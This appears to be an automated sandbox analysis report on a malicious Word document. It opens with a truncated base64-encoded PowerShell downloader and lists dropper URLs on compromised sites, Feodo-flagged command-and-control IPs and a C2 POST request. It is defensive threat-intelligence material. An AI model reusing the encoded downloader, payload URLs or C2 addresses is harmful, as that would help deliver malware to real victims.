UAdAAnACsAJwBvAHIAJwArACcAZQAnACkAKwAoACcAcwBlACcAKwAnAHQAJwApACsAKAAnAG0AJwArACcAZQAuAGMAbwBtAC8AJwApACsAKAAnAHcAJwArACcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAnAHQAJwArACcAZQAnACsAKAAnAG4AdAAnACsAJwAvAFIAawAnACkAKwAnADQAcgAnACsAJwB6AC8AJwArACgAJwBAAHMAJwArACcAZwAgAHkAdwAnACsAJwAgAGEAJwApACsAJwBoACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBuAHQAZQAnACsAJwBsAGwAaQAnACkAKwAnAHMAJwArACgAJwBhACcAKwAnAHYAdgB5AC4AYwAnACkAKwAnAG8AJwArACcAbQAvACcAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAZABtAGkAbgAnACsAJwAvAGQAJwArACcAUgAnACkAKwAnAGEARwAnACsAKAAnADIASAAnACsAJwAvAEAAcwBnACcAKQArACcAIAAnACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhACcAKwAnAGgAcwA6ACcAKQArACcALwAnACsAJwAvAG0AJwArACgAJwByAHYAJwArACcAZQAnACsAJwBnAGcAeQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwBwACcAKwAoACcALQBhAGQAbQAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcAbgAnACkAKwAnAC8AQAAnACsAJwBzACcAKwAnAGcAIAAnACsAKAAnAHkAdwAgAGEAaABzACcAKwAnADoALwAvAGgAJwArACcAYgAnACkAKwAnAHAAcgAnACsAKAAnAGkAdgBpAGwAZQAnACsAJwBnACcAKwAnAGUAZAAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvAGMAJ

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: https://www.teelekded.com/cgi-bin/LPo/Avira URL Cloud: Label: malware
                      Source: https://ummahstars.com/app_old_may_2018/assets/wDL8x/Avira URL Cloud: Label: malware
                      Source: http://ketoresetme.com/wp-content/Rk4rz/Avira URL Cloud: Label: malware
                      Source: http://intellisavvy.com/wp-admin/dRaG2H/Avira URL Cloud: Label: malware
                      Source: https://hbprivileged.com/cgi-bin/Qg/Avira URL Cloud: Label: malware
                      Source: https://www.teelekded.com/cgi-bin/LPo/PAvira URL Cloud: Label: malware
                      Source: https://theo.digital/wp-admin/Zyl2/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dllMetadefender: Detection: 45%Perma Link
                      Source: C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dllReversingLabs: Detection: 85%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 68254_2001.docVirustotal: Detection: 46%Perma Link
                      Source: 68254_2001.docMetadefender: Detection: 48%Perma Link
                      Source: 68254_2001.docReversingLabs: Detection: 75%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\Ocmd_ke\Qqw8nbh\A30F.dllJoe Sandbox ML: detected

                      Compliance:

                      barindex
                      Uses insecure TLS / SSL version for HTTPS connectionShow sources
                      Source: unknownHTTPS traffic detected: 177.12.170.95:443 -> 192.168.2.22:49171 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 35.163.191.195:443 -> 192.168.2.22:49178 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 35.163.191.195:443 -> 192.168.2.22:49178 version: TLS 1.0
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2112325686.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2112325686.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2112325686.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2112325686.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2112325686.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2112325686.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2112325686.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2112185390.0000000002AF0000.00000002.00000001.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global trafficDNS query: name: ketoresetme.com
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.124.249.8:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 70.32.23.58:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.22:49179 -> 84.232.229.24:80
                      Source: TrafficSnort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.22:49180 -> 51.255.203.164:8080
                      Source: TrafficSnort IDS: 2404328 ET CNC Feodo Tracker Reported CnC Server TCP group 15 192.168.2.22:49182 -> 217.160.169.110:8080
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2123660159.000000001D0F7000.00000002.00000001.sdmpString found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
                      Source: powershell.exe, 00000005.00000002.2123660159.000000001D0F7000.00000002.00000001.sdmpString found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
                      Source: powershell.exe, 00000005.00000002.2123660159.000000001D0F7000.00000002.00000001.sdmpString found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
                      Source: powershell.exe, 00000005.00000002.2123660159.000000001D0F7000.00000002.00000001.sdmpString found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
                      Source: powershell.exe, 00000005.00000002.2123660159.000000001D0F7000.00000002.00000001.sdmpString found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
                      Source: powershell.exe, 00000005.00000002.2123660159.000000001D0F7000.00000002.00000001.sdmpString found in memory: Do you want to switch to it now?
                      Source: powershell.exe, 00000005.00000002.2123660159.000000001D0F7000.00000002.00000001.sdmpString found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
                      Source: powershell.exe, 00000005.00000002.2123472940.000000001CF10000.00000002.00000001.sdmpString found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
                      Source: powershell.exe, 00000005.00000002.2123472940.000000001CF10000.00000002.00000001.sdmpString found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
                      Source: powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmpString found in memory: http://ketoresetme.com/wp-content/Rk4rz/
                      Source: powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmpString found in memory: http://intellisavvy.com/wp-admin/dRaG2H/
                      Source: powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmpString found in memory: https://mrveggy.com/wp-admin/n/
                      Source: powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmpString found in memory: https://hbprivileged.com/cgi-bin/Qg/
                      Source: powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmpString found in memory: https://theo.digital/wp-admin/Zyl2/
                      Source: powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmpString found in memory: https://ummahstars.com/app_old_may_2018/assets/wDL8x/
                      Source: powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmpString found in memory: https://www.teelekded.com/cgi-bin/LPo/
                      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 51.255.203.164:8080
                      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 217.160.169.110:8080
                      Source: global trafficHTTP traffic detected: GET /wp-content/Rk4rz/ HTTP/1.1Host: ketoresetme.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/dRaG2H/ HTTP/1.1Host: intellisavvy.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 70.32.23.58 70.32.23.58
                      Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewASN Name: A2HOSTINGUS A2HOSTINGUS
                      Source: Joe Sandbox ViewASN Name: GOOGLE-2US GOOGLE-2US
                      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: global trafficHTTP traffic detected: POST /mcbf10vnnn8hf/qv9l36h26wgbq5tqf/ HTTP/1.1DNT: 0Referer: 51.15.7.145/mcbf10vnnn8hf/qv9l36h26wgbq5tqf/Content-Type: multipart/form-data; boundary=-----------------GbQkm8qOKaDBZZ6NNUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.15.7.145Content-Length: 6020Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 177.12.170.95:443 -> 192.168.2.22:49171 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 35.163.191.195:443 -> 192.168.2.22:49178 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 35.163.191.195:443 -> 192.168.2.22:49178 version: TLS 1.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 217.160.169.110
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.7.145
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.7.145
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.7.145
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.7.145
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.7.145
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.7.145
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.7.145
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.7.145
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.7.145
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A5D0E98E-EB6B-4CC4-8C38-663EBE143117}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /wp-content/Rk4rz/ HTTP/1.1Host: ketoresetme.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/dRaG2H/ HTTP/1.1Host: intellisavvy.comConnection: Keep-Alive
                      Source: powershell.exe, 00000005.00000002.2123472940.000000001CF10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127555441.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2124154383.0000000001F60000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: powershell.exe, 00000005.00000002.2120952904.000000001B480000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: ketoresetme.com
                      Source: unknownHTTP traffic detected: POST /mcbf10vnnn8hf/qv9l36h26wgbq5tqf/ HTTP/1.1DNT: 0Referer: 51.15.7.145/mcbf10vnnn8hf/qv9l36h26wgbq5tqf/Content-Type: multipart/form-data; boundary=-----------------GbQkm8qOKaDBZZ6NNUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.15.7.145Content-Length: 6020Connection: Keep-AliveCache-Control: no-cache
                      Source: powershell.exe, 00000005.00000002.2120553470.0000000003BDD000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                      Source: powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/0
                      Source: powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
                      Source: powershell.exe, 00000005.00000002.2123409820.000000001CD42000.00000004.00000001.sdmpString found in binary or memory: http://certs.godaddy.com/repository/1301
                      Source: powershell.exe, 00000005.00000002.2120553470.0000000003BDD000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                      Source: powershell.exe, 00000005.00000002.2120553470.0000000003BDD000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                      Source: powershell.exe, 00000005.00000002.2121560915.000000001B556000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: powershell.exe, 00000005.00000002.2121616867.000000001B565000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: powershell.exe, 00000005.00000002.2121560915.000000001B556000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: powershell.exe, 00000005.00000002.2121616867.000000001B565000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdig2s1-1814.crl0
                      Source: powershell.exe, 00000005.00000002.2123409820.000000001CD42000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
                      Source: powershell.exe, 00000005.00000003.2109481139.000000001CD42000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
                      Source: powershell.exe, 00000005.00000002.2120553470.0000000003BDD000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                      Source: powershell.exe, 00000005.00000002.2121560915.000000001B556000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: powershell.exe, 00000005.00000002.2121560915.000000001B556000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: powershell.exe, 00000005.00000002.2109772085.00000000003B1000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: powershell.exe, 00000005.00000002.2120952904.000000001B480000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: powershell.exe, 00000005.00000002.2120526836.0000000003B92000.00000004.00000001.sdmpString found in binary or memory: http://intellisavvy.com
                      Source: powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmpString found in binary or memory: http://intellisavvy.com/wp-admin/dRaG2H/
                      Source: powershell.exe, 00000005.00000002.2123472940.000000001CF10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127555441.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2124154383.0000000001F60000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: powershell.exe, 00000005.00000002.2123472940.000000001CF10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127555441.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2124154383.0000000001F60000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: powershell.exe, 00000005.00000002.2120526836.0000000003B92000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com
                      Source: powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmpString found in binary or memory: http://ketoresetme.com/wp-content/Rk4rz/
                      Source: powershell.exe, 00000005.00000002.2123660159.000000001D0F7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127830169.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2124541476.0000000002147000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2134936762.0000000002007000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: powershell.exe, 00000005.00000002.2123660159.000000001D0F7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127830169.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2124541476.0000000002147000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2134936762.0000000002007000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: powershell.exe, 00000005.00000002.2121560915.000000001B556000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: powershell.exe, 00000005.00000002.2121376254.000000001B540000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: powershell.exe, 00000005.00000002.2121560915.000000001B556000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: powershell.exe, 00000005.00000002.2121560915.000000001B556000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: powershell.exe, 00000005.00000002.2121560915.000000001B556000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: powershell.exe, 00000005.00000002.2121560915.000000001B556000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: powershell.exe, 00000005.00000002.2121616867.000000001B565000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/0
                      Source: powershell.exe, 00000005.00000003.2109481139.000000001CD42000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/02
                      Source: powershell.exe, 00000005.00000002.2123409820.000000001CD42000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/05
                      Source: powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: powershell.exe, 00000005.00000002.2120553470.0000000003BDD000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0%
                      Source: powershell.exe, 00000005.00000002.2120553470.0000000003BDD000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
                      Source: powershell.exe, 00000005.00000002.2110315504.0000000002240000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2135208859.0000000002750000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: powershell.exe, 00000005.00000002.2123888696.000000001D2F0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
                      Source: powershell.exe, 00000005.00000002.2123660159.000000001D0F7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127830169.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2124541476.0000000002147000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2134936762.0000000002007000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: powershell.exe, 00000005.00000002.2123660159.000000001D0F7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127830169.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2124541476.0000000002147000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2134936762.0000000002007000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: powershell.exe, 00000005.00000002.2110315504.0000000002240000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2135208859.0000000002750000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: powershell.exe, 00000005.00000002.2121616867.000000001B565000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: powershell.exe, 00000005.00000002.2121560915.000000001B556000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: powershell.exe, 00000005.00000002.2123472940.000000001CF10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127555441.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2124154383.0000000001F60000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: powershell.exe, 00000005.00000002.2123660159.000000001D0F7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127830169.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2124541476.0000000002147000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2134936762.0000000002007000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: powershell.exe, 00000005.00000002.2123472940.000000001CF10000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127555441.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2124154383.0000000001F60000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000005.00000002.2109740274.0000000000364000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaneN
                      Source: powershell.exe, 00000005.00000002.2109740274.0000000000364000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                      Source: rundll32.exe, 00000008.00000002.2134527385.0000000001E20000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: powershell.exe, 00000005.00000002.2123409820.000000001CD42000.00000004.00000001.sdmpString found in binary or memory: https://certs.godaddy.com/repository/0
                      Source: powershell.exe, 00000005.00000002.2120553470.0000000003BDD000.00000004.00000001.sdmpString found in binary or memory: https://hbprivileged.com
                      Source: powershell.exe, 00000005.00000002.2119387476.0000000002F32000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2120461916.0000000003AAE000.00000004.00000001.sdmpString found in binary or memory: https://hbprivileged.com/cgi-bin/Qg/
                      Source: powershell.exe, 00000005.00000002.2120553470.0000000003BDD000.00000004.00000001.sdmpString found in binary or memory: https://hbprivileged.comhB
                      Source: powershell.exe, 00000005.00000002.2120526836.0000000003B92000.00000004.00000001.sdmpString found in binary or memory: https://intellisavvy.com
                      Source: powershell.exe, 00000005.00000002.2120526836.0000000003B92000.00000004.00000001.sdmpString found in binary or memory: https://intellisavvy.com/wp-admin/dRaG2H/
                      Source: powershell.exe, 00000005.00000002.2120548704.0000000003BD8000.00000004.00000001.sdmpString found in binary or memory: https://intellisavvy.comh
                      Source: powershell.exe, 00000005.00000002.2120553470.0000000003BDD000.00000004.00000001.sdmpString found in binary or memory: https://mrveggy.com
